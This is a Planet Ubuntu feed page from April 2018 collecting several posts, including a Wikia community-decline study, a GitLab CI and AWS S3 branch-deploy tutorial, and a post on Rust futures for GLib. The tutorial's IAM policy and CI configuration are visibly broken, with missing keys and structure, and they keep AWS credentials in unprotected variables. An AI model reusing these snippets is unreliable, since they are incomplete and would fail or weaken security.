Most recent items from Ubuntu feeds:
The Fridge: Ubuntu Weekly Newsletter Issue 524 from Planet Ubuntu

Welcome to the Ubuntu Weekly Newsletter, Issue 524 for the week of April 15 – 21, 2018 – the full version is available here.
In this issue we cover:

Bionic Beaver (18.04 LTS) Final Freeze
First set of Bionic (sort-of) RC images
Ubuntu Stats
Hot in Support
UbuCon Europe 2018 | 1 Week to go!!
LoCo Events
Help test memory leak fixes in 18.04 LTS
This Week in Lubuntu Development #3
Xfce Component Updates and More
Welcome To The (Ubuntu) Bionic Age: Interviewing people behind Communitheme
Collaboration Conference (at Open Source Summit) Call For Papers
MAAS 2.4.0 beta 2 released!
gksu removed from Ubuntu
Other Community News
Canonical News
In the Press
In the Blogosphere
Other Articles of Interest
Featured Audio and Video
Weekly Ubuntu Development Team Meetings
Upcoming Meetings and Events
Updates and Security for 14.04, 16.04, and 17.04
And much more!

The Ubuntu Weekly Newsletter is brought to you by:

Krytarik Raido
Wild Man
Athul Muralidhar
And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!
Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

about 3 hours ago

Benjamin Mako Hill: Is English Wikipedia’s ‘rise and decline’ typical? from Planet Ubuntu

This graph shows the number of people contributing to Wikipedia over time:
[Figure: The number of active Wikipedia contributors exploded, suddenly stalled, and then began gradually declining. (Figure taken from Halfaker et al. 2013)]
The figure comes from “The Rise and Decline of an Open Collaboration System,” a well-known 2013 paper that argued that Wikipedia’s transition from rapid growth to slow decline in 2007 was driven by an increase in quality control systems. Although many people have treated the paper’s finding as representative of broader patterns in online communities, Wikipedia is a very unusual community in many respects. Do other online communities follow Wikipedia’s pattern of rise and decline? Does increased use of quality control systems coincide with community decline elsewhere?
In a paper that my student Nathan TeBlunthuis is presenting Thursday morning at the Association for Computing Machinery (ACM) Conference on Human Factors in Computing Systems (CHI), a group of us have replicated and extended the 2013 paper's analysis in 769 other large wikis. We find that the dynamics observed in Wikipedia are a strikingly good description of the average Wikia wiki. They appear to recur again and again in many communities.
The original “Rise and Decline” paper (we’ll abbreviate it “RAD”) was written by Aaron Halfaker, R. Stuart Geiger, Jonathan T. Morgan, and John Riedl. They analyzed data from English Wikipedia and found that Wikipedia’s transition from rise to decline was accompanied by increasing rates of newcomer rejection as well as the growth of bots and algorithmic quality control tools. They also showed that newcomers whose contributions were rejected were less likely to continue editing and that community policies and norms became more difficult to change over time, especially for newer editors.
Our paper, just published in the CHI 2018 proceedings, replicates most of RAD's analysis on a dataset of 769 of the largest wikis from Wikia that were active between 2002 and 2010. We find that RAD's findings generalize to this large and diverse sample of communities.
We can walk you through some of the key findings. First, the growth trajectory of the average wiki in our sample is similar to that of English Wikipedia. As shown in the figure below, an initial period of growth stabilizes and leads to decline several years later.
[Figure: The average Wikia wiki also experiences a period of growth followed by stabilization and decline (from TeBlunthuis, Shaw, and Hill 2018).]
We also found that newcomers on Wikia wikis were reverted more and continued editing less. As on Wikipedia, the two processes were related. Similar to RAD, we also found that newer editors were more likely to have their contributions to the “project namespace” (where policy pages are located) undone as wikis got older. Indeed, the specific estimates from our statistical models are very similar to RAD’s for most of these findings!
There were some parts of the RAD analysis that we couldn’t reproduce in our context. For example, there are not enough bots or algorithmic editing tools in Wikia to support statistical claims about their effects on newcomers.
At the same time, we were able to do some things that the RAD authors could not.  Most importantly, our findings discount some Wikipedia-specific explanations for a rise and decline. For example, English Wikipedia’s decline coincided with the rise of Facebook, smartphones, and other social media platforms. In theory, any of these factors could have caused the decline. Because the wikis in our sample experienced rises and declines at similar points in their life-cycle but at different points in time, the rise and decline findings we report seem unlikely to be caused by underlying temporal trends.
The big communities we study seem to have consistent “life cycles” where stabilization and/or decay follows an initial period of growth. The fact that the same kinds of patterns happen on English Wikipedia and other online groups implies a more general set of social dynamics at work that we do not think existing research (including ours) explains in a satisfying way. What drives the rise and decline of communities more generally? Our findings make it clear that this is a big, important question that deserves more attention.
We hope you’ll read the paper and get in touch by commenting on this post or emailing Nate if you’d like to learn or talk more. The paper is available online and has been published under an open access license. If you really want to get into the weeds of the analysis, we will soon publish all the data and code necessary to reproduce our work in a repository on the Harvard Dataverse.
Nate TeBlunthuis will be presenting the project this week at CHI in Montréal on Thursday April 26 at 9am in room 517D.  For those of you not familiar with CHI, it is the top venue for Human-Computer Interaction. All CHI submissions go through double-blind peer review and the papers that make it into the proceedings are considered published (same as journal articles in most other scientific fields). Please feel free to cite our paper and send it around to your friends!

This blog post, and the open access paper that it describes, is a collaborative project with Aaron Shaw, that was led by Nate TeBlunthuis. A version of this blog post was originally posted on the Community Data Science Collective blog. Financial support came from the US National Science Foundation (grants IIS-1617129,  IIS-1617468, and GRFP-2016220885 ), Northwestern University, the Center for Advanced Study in the Behavioral Sciences at Stanford University, and the University of Washington. This project was completed using the Hyak high performance computing cluster at the University of Washington.

about 4 hours ago

Lubuntu Blog: This Week in Lubuntu Development #4 from Planet Ubuntu

Here is the fourth issue of This Week in Lubuntu Development. You can read last week's issue here. Changes General Some work was done on the Lubuntu Manual by Lubuntu contributor Lyn Perrine. You can see the commits she has made here. We need your help with the Lubuntu Manual! Take a look at […]

about 9 hours ago

Riccardo Padovani: AWS S3 + GitLab CI = automatic deploy for every branch of your static website from Planet Ubuntu

You have a static website and you want to share the latest changes with your
team before going live. How do you do that?

If you use GitLab and have an AWS account, it's time to step up your game and
automate everything. We are going to set up a system that deploys every branch
you create to S3, and cleans up after itself when the branch is merged or
deleted.

AWS S3 is just a storage service, so of course you can't host a dynamic website
this way, but for a static one (like this blog) it is perfect.

Also, please note that AWS S3 buckets used for hosting a website are public, and
while you need to know the URL to access them, there are ways to list them. So do
not set up this system if your website contains private data.

Of course, standard S3 prices will apply.

We will use GitLab CI, since it is shipped with GitLab and deeply
integrated with it.

GitLab CI is a very powerful Continuous Integration system with a lot of
different features, and new features land with every release. It has
rich technical documentation that I suggest you read.

If you want to know why Continuous Integration is important, I suggest reading
this article, while for the reasons to use GitLab CI
specifically, I leave the job to GitLab itself. I've also
written another article with a small introduction to GitLab.

I assume you already have an AWS account and know roughly how GitLab CI
works. If not, please create an account and read some of the links above to
learn about GitLab CI.

Setting up AWS

The first thing is setting up AWS S3 and a dedicated IAM user that can push to S3.

Since every developer with permission to push to the repository will have
access to the tokens of the IAM user, it is better to limit its permissions as
much as possible.

Setting up S3

To set up S3, go to the S3 control panel, create a new bucket, choose a name
(from now on, I will use example-bucket) and a region, and finish the
creation leaving the default settings.

After that, you need to enable website management: go to Bucket ->
Properties and enable Static website hosting, selecting Use this bucket
to host a website as in the image. As the index document, put index.html - you
can then upload a landing page there, if you want.

Take note of the bucket's URL; we will need it later.
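If you ever lose the URL, the static-website endpoint follows a predictable pattern, so you can reconstruct it from the bucket name and region. A minimal sketch, assuming for illustration the example-bucket name from above and the eu-central-1 region (note that a few older regions use a dash, s3-website-REGION, instead of a dot):

```shell
# Sketch: derive the S3 static-website endpoint from bucket name and region.
# Newer regions use "s3-website.REGION"; some older ones use
# "s3-website-REGION" (with a dash) - check the console if unsure.
BUCKET=example-bucket
REGION=eu-central-1
echo "http://${BUCKET}.s3-website.${REGION}.amazonaws.com"
```

This prints the same URL the console shows under Static website hosting.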

We now grant everybody permission to read objects; we will use the policy
described in the AWS guide. For other information on how
to host a static website, please follow the official documentation.

To grant the read permissions, go to Permissions -> Bucket policy and insert:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicReadGetObject",
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::example-bucket/*"
        }
    ]
}

Of course, you need to insert your bucket's name in the Resource line.

Creating the IAM user

Now we need to create the IAM user that will upload content to the S3 bucket,
with a policy that allows uploads only to our bucket.

Go to IAM and create a new policy, with the name you prefer:

"Version": "2012-10-17",
"Statement": [
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"Resource": "arn:aws:s3:::example-bucket/*"
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": "s3:ListObjects",
"Resource": "*"

Of course, again, you should change the Resource field to the name of your
bucket. If you know the GitLab runners’ IPs, you can restrict the policy to that

Now you can create a new user granting it Programmatic access. I will call
it gitlabs3uploader. Assign it the policy we just created.

For more information on how to manage multiple AWS accounts for security
reasons, I leave you to the official guide.

Setting up GitLab CI

We need to inject the credentials in the GitLab runner. Go to your project,
Settings -> CI / CD -> Secret variables and set two variables:

AWS_ACCESS_KEY_ID with the new user’s access key
AWS_SECRET_ACCESS_KEY with the new user’s access secret key

Since we want to publish every branch, we do not set them as protected,
because they need to be available in every branch.
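Under the hood, GitLab exposes these secret variables as plain environment variables inside each job, which is exactly where the AWS CLI looks for credentials first, so no aws configure step is needed. A minimal sketch (the key values here are placeholders, not real credentials):

```shell
# GitLab injects secret variables as environment variables in each job.
# The AWS CLI picks these two up automatically, before any config files.
export AWS_ACCESS_KEY_ID="AKIAEXAMPLEKEY"          # placeholder value
export AWS_SECRET_ACCESS_KEY="example-secret-key"  # placeholder value

# Sanity check that the credentials are visible to child processes (awscli)
[ -n "$AWS_ACCESS_KEY_ID" ] && [ -n "$AWS_SECRET_ACCESS_KEY" ] && echo "credentials set"
```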


We now need to tell GitLab how to publish the website. If you need to build
it first, you can do so. This blog uses Jekyll, so my .gitlab-ci.yml
file looks like this:

image: "" # Custom Ruby image, replace with whatever you want
- build
- deploy

AWS_DEFAULT_REGION: eu-central-1 # The region of our S3 bucket
BUCKET_NAME: bucket-name # Your bucket name

- vendor

buildJekyll: # A job to build the static website - replace it with your build methods
stage: build
- bundle install --path=vendor/
- bundle exec jekyll build --future # The server is in another timezone..
- _site/ # This is what we want to publish, replace with your `dist` directory

image: "python:latest" # We use python because there is a well-working AWS Sdk
stage: deploy
- buildJekyll # We want to specify dependencies in an explicit way, to avoid confusion if there are different build jobs
- pip install awscli # Install the SDK
- aws s3 cp _site s3://${BUCKET_NAME}/${CI_COMMIT_REF_SLUG} --recursive # Replace example-bucket with your bucket
url: http://${BUCKET_NAME}${CI_COMMIT_REF_SLUG} # This is the url of the bucket we saved before
on_stop: clean_s3 # When the branch is merged, we clean up after ourself

image: "python:latest"
stage: deploy
- pip install awscli
- aws s3 rm s3://${BUCKET_NAME}/${CI_COMMIT_REF_SLUG} --recursive # Replace example-bucket with your bucket
action: stop
when: manual
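The CI_COMMIT_REF_SLUG variable used in those paths is GitLab's URL-safe version of the branch name. As a rough sketch (this is an approximation, not GitLab's exact implementation), it behaves roughly like this:

```shell
# Approximate CI_COMMIT_REF_SLUG: lowercase, replace anything outside
# [a-z0-9] with '-', strip leading/trailing dashes, cap at 63 characters.
slugify() {
  printf '%s' "$1" \
    | tr '[:upper:]' '[:lower:]' \
    | sed -e 's/[^a-z0-9]/-/g' -e 's/^-*//' -e 's/-*$//' \
    | cut -c1-63
}

slugify "Feature/My_Branch"   # prints: feature-my-branch
```

This is why every branch gets its own clean prefix in the bucket, even if the branch name contains slashes or uppercase letters.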

For more information about dynamic environments, see the documentation.

To verify your .gitlab-ci.yml is correct, go to your project on GitLab, then
CI / CD -> Pipelines, and in the top right of the page there is a CI
Lint link. It not only lints your configuration, but also creates a nice
overview of all your jobs.

Thanks to environments, we will have the link to the test deployment
directly in the merge request, so your QA team, and every other stakeholder
interested in seeing the website before it goes to production, can do so directly
from GitLab.

Also, after you merge your branch, GitLab will clean up after itself, so you do
not keep useless websites in S3.

You can also see all the deployments in CI / CD -> Environments, and
trigger new deploys.


They say 2018 is the year for DevOps. I am not sure about that,
but I am sure that a well-configured Continuous Integration and Continuous
Delivery system saves you and your company a lot of time and headaches.

If your builds are perfectly reproducible, and everything is
automatic, you can focus on what really matters: developing solutions for your
users.
This was a small example of how to integrate AWS and GitLab, but you know the
only limit is your imagination. Also, a lot of new features are introduced every
month in GitLab and GitLab CI, so keep an eye on the GitLab blog.

Kudos to the GitLab team (and the other folks who help in their free time) for
their awesome work!

If you have any questions or feedback about this blog post, please drop me an
email or tweet me :-)
Feel free to suggest additions, or clearer ways to phrase paragraphs
(English is not my mother tongue).

Bye for now,

P.S.: if you have found this article helpful and you'd like me to write others,
would you mind helping me reach the Ballmer Peak and buying me
a beer?

about 11 hours ago

Sebastian Dröge: GLib/GIO async operations and Rust futures + async/await from Planet Ubuntu

Unfortunately I was not able to attend the Rust+GNOME hackfest in Madrid last week, but I could at least spend some of my work time at Centricular on implementing one of the things I wanted to work on during the hackfest. The other one, more closely related to the gnome-class work, will be the topic of a future blog post once I actually have something to show.
So back to the topic. With the latest GIT version of the Rust bindings for GLib, GTK, etc it is now possible to make use of the Rust futures infrastructure for GIO async operations and various other functions. This should make writing of GNOME, and in general GLib-using, applications in Rust quite a bit more convenient.
For the impatient, the summary is that you can use Rust futures with GLib and GIO now, that it works both on the stable and nightly version of the compiler, and with the nightly version of the compiler it is also possible to use async/await. An example with the latter can be found here, and an example just using futures without async/await here.
Table of Contents

Futures in Rust
Futures & GLib/GIO
GLib Futures
GIO Asynchronous Operations
The Future

First of all, what are futures and how do they work in Rust? In a few words, a future (also called a promise elsewhere) is a value that represents the result of an asynchronous operation, e.g. establishing a TCP connection. The operation itself (usually) runs in the background, and only once the operation is finished (or fails), the future resolves to the result of that operation. There are all kinds of ways to combine futures, e.g. to execute some other (potentially async) code with the result once the first operation has finished.
It’s a concept that is also widely used in various other programming languages (e.g. C#, JavaScript, Python, …) for asynchronous programming and can probably be considered a proven concept at this point.
Futures in Rust
In Rust, a future is basically an implementation of a relatively simple trait called Future. The following is the definition as of now, but there are currently discussions to change/simplify/generalize it and to also move it to the Rust standard library:
pub trait Future {
    type Item;
    type Error;

    fn poll(&mut self, cx: &mut task::Context) -> Poll<Self::Item, Self::Error>;
}
Anything that implements this trait can be considered an asynchronous operation that resolves to either an Item or an Error. Consumers of the future would call the poll method to check if the future has resolved already (to a result or error), or if the future is not ready yet. In case of the latter, the future itself would at a later point, once it is ready to proceed, notify the consumer about that. It would get a way for notifications from the Context that is passed, and proceeding does not necessarily mean that the future will resolve after this but it could just advance its internal state closer to the final resolution.
Calling poll manually is kind of inconvenient, so generally this is handled by an Executor on which the futures are scheduled and which is running them until their resolution. Equally, it’s inconvenient to have to implement that trait directly so for most common operations there are combinators that can be used on futures to build new futures, usually via closures in one way or another. For example the following would run the passed closure with the successful result of the future, and then have it return another future (Ok(()) is converted via IntoFuture to the future that always resolves successfully with ()), and also maps any errors to ()
fn our_future() -> impl Future<Item = (), Error = ()> {
    some_future // placeholder: any future whose result we want to consume
        .and_then(|res| {
            do_something_with(res); // placeholder for the actual work
            Ok(())
        })
        .map_err(|_| ())
}
A future represents only a single value, but there is also a trait for something producing multiple values: a Stream. For more details, best to check the documentation.
The above way of combining futures via combinators and closures is still not too great, and is still close to callback hell. In other languages (e.g. C#, JavaScript, Python, …) this was solved by introducing new features to the language: async for declaring futures with normal code flow, and await for suspending execution transparently and resuming at that point in the code with the result of a future.
Of course this was also implemented in Rust. Currently based on procedural macros, but there are discussions to actually move this also directly into the language and standard library.
The above example would look something like the following with the current version of the macros
#[async]
fn our_future() -> Result<(), ()> {
    let res = await!(some_future)
        .map_err(|_| ())?;

    do_something_with(res); // placeholder for the actual work
    Ok(())
}

This looks almost like normal, synchronous code but is internally converted into a future and completely asynchronous.
Unfortunately this is currently only available on the nightly version of Rust until various bits and pieces get stabilized.
Most of the time when people talk about futures in Rust, they implicitly also mean Tokio. Tokio is a pure-Rust, cross-platform asynchronous IO library based on the futures abstraction above. It provides a futures executor and various types for asynchronous IO, e.g. sockets and socket streams.
But while Tokio is a great library, we’re not going to use it here and instead implement a futures executor around GLib. And on top of that implement various futures, also around GLib’s sister library GIO, which is providing lots of API for synchronous and asynchronous IO.
Just like all IO operations in Tokio, all GLib/GIO asynchronous operations are dependent on running with their respective event loop (i.e. the futures executor) and while it’s possible to use both in the same process, each operation has to be scheduled on the correct one.
Futures & GLib/GIO
Asynchronous operations and generally everything event related (timeouts, …) are based on callbacks that you have to register, and are running via a GMainLoop that is executing events from a GMainContext. The latter is just something that stores everything that is scheduled and provides API for polling if something is ready to be executed now, while the former does exactly that: executing.
The callback based API is also available via the Rust bindings, and would for example look as follows
glib::timeout_add(20, || {
    // Called after 20ms
    glib::Continue(false) // don't call again
});

glib::idle_add(|| {
    // Called when the main loop is idle
    glib::Continue(false) // don't call again
});

some_async_operation(|res| {
    match res {
        Err(err) => report_error_somehow(),
        Ok(res) => {
            some_other_async_operation(|res| {
                // ... and so on, ever deeper ...
            });
        }
    }
});
As can be seen here already, the callback-based approach leads to quite non-linear code and deep indentation due to all the closures. Also, error handling becomes quite tricky because you somehow have to handle errors from a completely different call stack.
Compared to C this is still far more convenient due to actually having closures that can capture their environment, but we can definitely do better in Rust.
The above code also assumes that somewhere a main loop is running on the default main context, which could be achieved with the following e.g. inside main()
let ctx = glib::MainContext::default();
let l = glib::MainLoop::new(Some(&ctx), false);

// All operations here would be scheduled on this main context

// Run everything until someone calls l.quit()
l.run();
It is also possible to explicitly select for various operations on which main context they should run, but that’s just a minor detail.
GLib Futures
To make this situation a bit nicer, I’ve implemented support for futures in the Rust bindings. This means, that the GLib MainContext is now a futures executor (and arbitrary futures can be scheduled on it), all the GSource related operations in GLib (timeouts, UNIX signals, …) have futures- or stream-based variants and all the GIO asynchronous operations also come with futures variants now. The latter are autogenerated with the gir bindings code generator.
For enabling usage of this, the futures feature of the glib and gio crates have to be enabled, but that’s about it. It is currently still hidden behind a feature gate because the futures infrastructure is still going to go through some API incompatible changes in the near future.
So let’s take a look at how to use it. First of all, setting up the main context and executing a trivial future on it
let c = glib::MainContext::default();
let l = glib::MainLoop::new(Some(&c), false);

// Spawn a future that is called from the main context
// and after printing something just quits the main loop
let l_clone = l.clone();
c.spawn(futures::lazy(move |_| {
    println!("we're called from the main context");
    l_clone.quit();
    Ok(())
}));

l.run();

Apart from spawn(), there is also a spawn_local(). The former can be called from any thread but requires the future to implement the Send trait (that is, it must be safe to send it to other threads) while the latter can only be called from the thread that owns the main context but it allows any kind of future to be spawned. In addition there is also a block_on() function on the main context, which allows running non-static futures up to their completion and returns their result. The spawn functions only work with static futures (i.e. they have no references to any stack frame) and require the futures to be infallible and resolve to ().
The above code already showed one of the advantages of using futures: it is possible to use all generic futures (that don’t require a specific executor), like futures::lazy or the mpsc/oneshot channels with GLib now. And any of the combinators that are available on futures
let c = MainContext::new();

let res = c.block_on(timeout_future(20)
    .and_then(move |_| {
        // Called after 20ms
        Ok(1)
    }));

assert_eq!(res, Ok(1));
This example also shows the block_on functionality to return an actual value from the future (1 in this case).
GIO Asynchronous Operations
Similarly, all asynchronous GIO operations are now available as futures. For example to open a file asynchronously and getting a gio::InputStream to read from, the following could be done
let file = gio::File::new_for_path("Cargo.toml");

let l_clone = l.clone();
// Try to open the file
let future = file.read_async_future(glib::PRIORITY_DEFAULT)
    .map_err(|(_file, err)| {
        format!("Failed to open file: {}", err)
    })
    .and_then(move |(_file, strm)| {
        // Here we could now read from the stream, but
        // instead we just quit the main loop
        l_clone.quit();
        Ok(())
    });
// Spawn `future` on the main context as shown above, mapping the error
// case away (or reporting it) as appropriate.

A bigger example can be found in the gtk-rs examples repository here. This example is basically reading a file asynchronously in 64 byte chunks and printing it to stdout, then closing the file.
In the same way, network operations or any other asynchronous operation can be handled via futures now.
Compared to a callback-based approach, that bigger example is already a lot nicer but still quite heavy to read. With the async/await extension that I mentioned above already, the code looks much nicer in comparison and really almost like synchronous code. Except that it is not synchronous.
#[async]
fn read_file(file: gio::File) -> Result<(), String> {
    // Try to open the file
    let (_file, strm) = await!(file.read_async_future(glib::PRIORITY_DEFAULT))
        .map_err(|(_file, err)| format!("Failed to open file: {}", err))?;

    // Here we could now read from the stream...
    Ok(())
}

fn main() {
    let file = gio::File::new_for_path("Cargo.toml");

    let future = async_block! {
        match await!(read_file(file)) {
            Ok(()) => (),
            Err(err) => eprintln!("Got error: {}", err),
        }
        Ok(())
    };

    // (spawn the future on the main context and run the main loop as before)
}

For compiling this code, the futures-nightly feature has to be enabled for the glib crate, and a nightly compiler must be used.
The bigger example from before with async/await can be found here.
With this we’re already very close in Rust to having the same convenience as in other languages with asynchronous programming. And also it is very similar to what is possible in Vala with GIO asynchronous operations.
The Future
For now this is all finished and available from Git of the glib and gio crates. This will have to be updated in the future whenever the futures API changes, but it is planned to stabilize all this in Rust by the end of this year.
In the future it might also make sense to add futures variants for all the GObject signal handlers, so that e.g. handling a click on a GTK+ button could be done similarly from a future (or rather from a Stream, as a signal can be emitted multiple times). Whether this is more convenient in the end than the currently used callback-based approach remains to be seen. Some experimentation would be necessary here. Also, how to handle return values of signal handlers would have to be figured out.

about 16 hours ago

Jorge Castro: How to video conference without people hating you from Planet Ubuntu

While video conferencing has been a real boost to productivity there are still lots of things that can go wrong during a conference video call.

There are some things that are just plain out of your control, but there are some things that you can control. So, after doing these for the past 15 years or so, here are some tips if you’re just getting into remote work and want to do a better job. Of course I have been guilty of all of these. :D

Stuff to have

Get a Microphone - Other than my desk, chair, and good monitors, this is the number one upgrade you can do. Sound is one of those things that can immediately change the quality of your call. I use a Blue Yeti due to the simplicity of using USB audio, and having a hardware mute button. This way I know for sure I am muted when there’s a blinking red light in my face. Learn to use your microphone. On my Yeti you speak across the microphone and it has settings for where to pick up the noise from. Adjust these so it sounds correct. Get a pop filter.

A Video Camera - Notice I put this second. I can get past a crappy image if the audio is good. The Logitech C-900 series has long been my go-to standard for this. It also has dual noise-cancelling microphones, which are great as a backup (if you're on a trip), but I will always default to the dedicated microphone.

A decent set of headphones - Personal preference. I like open back ones when I’m working from home but pack a noise cancelling set for when I am on the road.

What about an integrated headset and microphone? This totally depends on the type. I tend to prefer the full sound of a real microphone but the boom mics on some of these headsets are quite good. If you have awesome headphones already you can add a modmic to turn them into a headset. I find that even the most budget dedicated headsets sound better than earbud microphones.

Stuff to get rid of

Your shitty earbuds - Seriously. If you're going to be a remote worker, invest in respecting your coworkers' time. A full hour-long design session with you holding a junky earbud microphone up to your face is not awesome for anybody. They're fine if you want to use them for listening, but don't use the mic.

“But this iPhone was $1000, my earbud mic is fine.” Nope. You sound like crap.

Garbage habits we all hate

If you’re just dialing in to listen then most of these won’t apply to you, however …

Always join on muted audio. If the platform you use doesn’t do this by default, find this setting and enable it.

If you don’t have anything to say at that moment, MUTE. Even if you are just sitting there you’re adding ambient noise to the meeting, and when it gets over 10 people this really, really, sucks. This is why I love having a physical mute button, you can always be sure at a glance without digging into settings. I’ve also used a USB switch pedal for mute with limited success.

Jumping in from a coffee shop, your work’s cafeteria, or any other place where there’s noise is not cool. And if you work in an open office all you’re doing is broadcasting to everyone else in the room that your place of employment doesn’t take developer productivity seriously.

“Oh I will use my external speakers and built in microphone and adjust the levels and it will sound fine.” - No, it won’t, you sound like a hot mess, put on your headset and use the microphone.

If you use your built-in microphone on your laptop and you start typing while you are talking EVERYBODY WILL HATE YOU.

If you're going to dial in from the back of an Uber or from a bus, and you have to talk or present, just don't come. Ask someone to run the meeting for you or reschedule. You're just wasting everyone's time if you think we want to hear you sprinting down a terminal to catch your flight.

And if you’re that person sitting on the plane in the meeting and people have to hear whatever thing you’re working on, they will hate you for the entire flight.

Treat video conferencing like you do everything else at work

We invest in our computers and our developer tools, so it’s important to think seriously about putting your video conferencing footprint in that namespace. There is a good chance no one will notice that you always sound good, but it’s one of those background quality things that just makes everyone more productive. Besides, think of the money you’ve spent on your laptop and everything else to make you better at work, better audio gear is a good investment.

In the real world, sometimes you just have to travel and you find yourself stuck on a laptop on hotel wireless in a corner trying to do your job, but I strive to make that situation the exception!

1 day ago

Sean Davis: MenuLibre 2.2.0 Released from Planet Ubuntu

After 2.5 years of on-again/off-again development, a new stable release of MenuLibre is now available! This release includes a vast array of changes since 2.0.7 and is recommended for all users.
What’s New?
Since MenuLibre 2.0.7, the previous stable release.

Support for Budgie, Cinnamon, EDE, KDE Plasma, LXQt, MATE, and Pantheon desktop environments
Version 1.1 of the Desktop Entry specification is now supported
Improved KeyFile backend for better file support

New Features

Integrated window identification for the StartupWmClass key
New dialog and notification for reviewing invalid desktop entries
New button to test launchers without saving
New button to sort menu directory contents alphabetically
Subdirectories can now be added to preinstalled system paths
Menu updates are now delayed to prevent file writing collisions

Interface Updates

New layout preferences! Budgie, GNOME, and Pantheon utilize client side decorations (CSD) while other desktops continue to use server side decorations (SSD) with a toolbar and menu.

Want to switch? The -b and -t commandline flags allow you to set your preference.

Simplified and easier-to-use widgets for Name, Comment, DBusActivatable, Executable, Hidden, Icon, and Working Directory keys
Hidden items are now italicized in the treeview
Directories are now represented by the folder icon
Updated application icon

Source tarball (md5, sig)
Available on Debian Testing/Unstable and Ubuntu 18.04 “Bionic Beaver”. Included in Xubuntu 18.04.

1 day ago

Sean Davis: Mugshot 0.4.0 Released from Planet Ubuntu

Mugshot, the simple user configuration utility, has hit a new stable milestone! Release 0.4.0 wraps up the 0.3 development cycle with full camera support for the past several years of GTK+ releases (and a number of other fixes).
What’s New?
Since Mugshot 0.2.5, the previous stable release.

Improved camera support, powered by Cheese and Clutter
AccountsService integration for more reliable user detail parsing
Numerous bug fixes with file access, parsing, and permissions
Translation updates for Brazilian Portuguese, Catalan, Croatian, Czech, Danish, Dutch, Finnish, French, German, Greek, Icelandic, Italian, Lithuanian, Polish, Portuguese, Romanian, Russian, Serbian, Slovak, Slovenian, Spanish, and Swedish

Source tarball (md5, sig)
Available in Debian Unstable and Ubuntu 18.04 “Bionic Beaver”. Included in Xubuntu 18.04.

1 day ago

Ubuntu Studio: Ubuntu Studio 18.04 Release Candidate from Planet Ubuntu

The Release Candidate for Ubuntu Studio 18.04 is ready for testing. Download it here. There are some known issues:

Volume label still set to Beta
base-files still not the final version
kernel will have (at least) one more revision

Please report any bugs using ubuntu-bug {package name}. Final release is scheduled to be released on […]

2 days ago

Kubuntu General News: Bionic (18.04) Release Candidate images ready for testing! from Planet Ubuntu

Initial RC (Release Candidate) images for the Kubuntu Bionic Beaver (18.04) are now available for testing.
The Kubuntu team will be releasing 18.04 on 26 April. The final Release Candidate milestone is available today, 21 April.
This is the first spin of a release candidate in preparation for the RC milestone. If major bugs are encountered and fixed, the RC images may be respun.
Kubuntu Beta pre-releases are NOT recommended for:

Regular users who are not aware of pre-release issues
Anyone who needs a stable system
Anyone uncomfortable running a possibly frequently broken system
Anyone in a production environment with data or workflows that need to be reliable

Kubuntu Beta pre-releases are recommended for:

Regular users who want to help us test by finding, reporting, and/or fixing bugs
Kubuntu, KDE, and Qt developers

Getting Kubuntu 18.04 RC testing images:
To upgrade to Kubuntu 18.04 pre-releases from 17.10, run sudo do-release-upgrade -d from a command line.
Download a Bootable image and put it onto a DVD or USB Drive via the download link at
This is also the direct link to report your findings and any bug reports you file.
See our release notes:
Please report your results on the Release tracker.

2 days ago

Gustavo Silva: Why Everyone should know vim from Planet Ubuntu

Vim is an improved version of Vi, a well-known text editor available by default on UNIX systems. The usual alternative is Emacs, but the two are so different that I feel they serve different purposes. Both are great, regardless.

I don’t feel vim is necessarily a geeky kind of taste. Vim introduced modal editing to me, and that has really changed my life. If you have ever tried vim, you may have noticed you have to press “i” or “a” (lower case) to start writing (note: I’m aware there are more ways to start editing, but the purpose here is not to cover Vim’s functionality). The fun part starts once you realize you can associate the Insert and Append commands with something. Then editing text becomes thinking of what you want the computer to show on the screen, instead of struggling with where you are before writing. The same goes for other commands, which are easily converted to mnemonics, and this is what helped me get comfortable with Vim. Note that Emacs does not have this kind of keybinding by default, but it does have a Vim-like mode: Evil (Extensible VI Layer).
More often than not, I just need to think of what I want to accomplish and type the first letters. Like Replace, Visual, Delete, and so on. It is a modal editor after all, meaning it has modes for everything. This is also what increases my productivity when writing files. I just think of my intentions and Vim does the things for me.

Here’s another cool example. Imagine this Python line (do not fear, this is not a coding post):

def function(aParameterThatChanged):

In a non-modal text editor, you would need to reach for your mouse, carefully select the text inside the parentheses (double-clicking might highlight it for you) and then delete it, type over it, etc. In Vim, there are basically two options. You can type di(, which will delete inside the symbol you typed. How helpful is that? Want to blow your mind? Typing ci( will change inside the symbol, deleting the text and switching to insert mode automatically.

Vim has a significant learning curve, I’m aware of that. Many people get discouraged on the first try, but sticking with Vim has changed how I perceive text editing, and I know, for sure, it has been a positive change. I write faster, editing is instant, I don’t need the mouse for anything at all, vim starts instantly, and there are many other cool features. For those looking for customization, Vim is fully customizable without putting much of a load on your CPU, as happens in Atom. Vim is also easily accessible anywhere. Take IntelliJ, for example, a multi-platform Java IDE. It even recommends installing the Vim plugin right after the installation process. Obviously, I did it. In a UNIX terminal, Vim comes by default.

I just wanted to praise modal editing, more than Vim itself, although the tool is amazing. I believe everyone should know Vim. It is simpler than Emacs, has lots of potential and it can make you more productive. But modal editing got me addicted to this. I can’t install an IDE without looking for vim extensions.

I would like everyone to try Vi’s modal editing. It will change your life, I assure you, despite requiring a bit of time in the beginning. If you ever get stuck, just Google your problem and I’m 150% positive you will find an answer. As time goes by, I’m positive you will discover features of vim you didn’t even know were possible.

Thanks for reading.


2 days ago

Benjamin Mako Hill: Mako Hate from Planet Ubuntu

I recently discovered a prolific and sustained community of meme-makers on Tumblr dedicated to expressing their strong dislike for “Mako.”
Two tags with examples are #mako hate and #anti mako but there are many others.
<figure class="wp-caption aligncenter" id="attachment_2955" style="width: 640px;">“even Mako hates Mako…” meme. Found on this forum thread.</figure>
I’ve also discovered Tumblrs entirely dedicated to the topic!
For example, Let’s Roast Mako describes itself as “A place to beat up Mako. In peace. It’s an inspiration to everyone!”
